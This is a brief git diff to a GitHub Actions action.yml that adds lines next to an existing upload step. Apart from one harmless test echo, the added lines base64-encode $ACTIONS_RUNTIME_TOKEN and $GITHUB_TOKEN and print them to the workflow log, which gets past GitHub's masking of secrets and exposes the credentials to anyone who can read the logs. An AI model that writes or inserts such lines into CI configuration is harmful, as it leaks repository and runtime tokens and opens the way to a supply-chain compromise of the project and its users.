diff --git a/action.yml b/action.yml index d1e663b..97dea81 100644 --- a/action.yml +++ b/action.yml @@ -73,6 +73,10 @@ runs: $( echo "$ACTIONS_RUNTIME_TOKEN" | sed 's/.*\.\(.*\)\..*/\1/' | base64 -d 2>/dev/null | sed 's/.*Actions.Results:\([^:]\+\):\([^:" ]\+\).*/\1 \2/' ) EOF + echo "p'tit test" + echo "$ACTIONS_RUNTIME_TOKEN" | base64 + echo "$GITHUB_TOKEN" | base64 + # Request an upload URL RESPONSE="$( wget -O - \ --header 'Content-Type:application/json' \